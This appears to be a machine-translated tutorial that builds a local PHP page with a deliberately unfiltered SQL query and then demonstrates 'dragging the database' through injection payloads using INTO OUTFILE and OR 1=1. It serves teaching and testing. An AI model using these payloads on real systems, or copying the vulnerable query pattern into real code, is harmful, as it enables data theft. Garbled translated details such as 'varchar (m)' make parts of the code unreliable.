If you want to test locally, you can download this free of points: Using SQL injection vulnerabilities to drag libraries
As in the previous article, we need to create a data table and access several data in the table for testing purposes.
Create a table in the database:
Copy Code code as follows:
CREATE TABLE ' article ' (
' ArticleID ' int (one) not NULL auto_increment,
' title ' varchar (m) CHARACTER SET UTF8 not NULL DEFAULT ',
' Content ' text CHARACTER SET UTF8 not NULL,
PRIMARY KEY (' ArticleID ')
) Engine=myisam auto_increment=7 DEFAULT charset=latin1;
Insert the data in the table operation I do not put the code, you can download it directly to the database.
Next, write a page that handles the user's request, where we deliberately do not filter the data submitted by the user, leaving a SQL injection vulnerability to test.
The code is as follows:
Copy Code code as follows:
<?php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "Test";
$id =$_get[' id '];//id unfiltered
$conn =mysql_connect ($servername, $dbusername, $dbpassword) or Die ("database connection failed");
mysql_select_db ($dbname, $conn);
mysql_query (' Set names UTF8 ');
$sql = "SELECT * from article WHERE articleid= ' $id '";
$result = mysql_query ($sql, $conn);
$row = Mysql_fetch_array ($result);
echo "<p> using SQL Injection Vulnerability drag Library <p>";
if (! $row) {
echo "The record does not exist";
Exit
}
echo "title <br>". $row [' title ']. " <p> ";
echo "Content <br>". $row [' contents ']. " <p> ";
?>
We enter it directly in the browser:
Http://127.0.0.1/marcofly/phpstudy/sqlinsert/showart.php?id=1
You can access a record with ID 1 in the article table
The results of the visit are as follows:
Next, we take advantage of this vulnerability (without knowing the vulnerability, only through Tools + manual detection) to demonstrate how to download the article table.
Enter in the Address bar: ' Into outfile ' e:/sql.txt '%23
Analysis:%23 is # 's ASCII code, because in the address bar directly into the database system will become empty, you need to enter the address bar 23, then will become a #, and then comment out the following SQL statement.
After running, open e disk, found more than one sql.txt file, open, inside is the table article a record.
Why is there only one record? Does the data table have only one record? No, because we only retrieve a record with ID 1, can we download all the records in the article table all at once?
The answer is yes, as long as your constructed SQL statements are flexible enough (again, the flexibility to construct SQL statements).
To analyze, when entering ' into outfile ' e:/sql.txt '%23 in the URL address bar, the merged into the SQL query statement becomes:
SELECT * from article WHERE articleid= ' 5 ' into outfile ' e:/whf.txt ' # '
After careful analysis, we can construct the SQL statement like this:
SELECT * from article WHERE articleid= ' or 1=1 into outfile ' e:/whf.txt ' # '
In that case, the WHERE clause is always true, in other words, the SQL statement is equivalent to the following:
SELECT * from article into outfile ' e:/whf.txt ' # '
You see, the SQL statement retrieves all of the contents of the table article, and then executes into outfile ' e:/whf.txt ' to get the contents out.
If you don't believe me, you carry out ...
With SQL injection vulnerabilities, we can guess the table name, column name, user's password length (left function), and so on, of course, if you can directly to the above demo in the table all the data out of the list, there is no need to guess the list name and so on.
A little tired, I wrote here.
Using SQL injection vulnerabilities to log in to the background and use SQL Injection Vulnerability Drag library I learned the relevant content after a little summary, no depth, as the beginning of the article, right when summed up, there is no other meaning.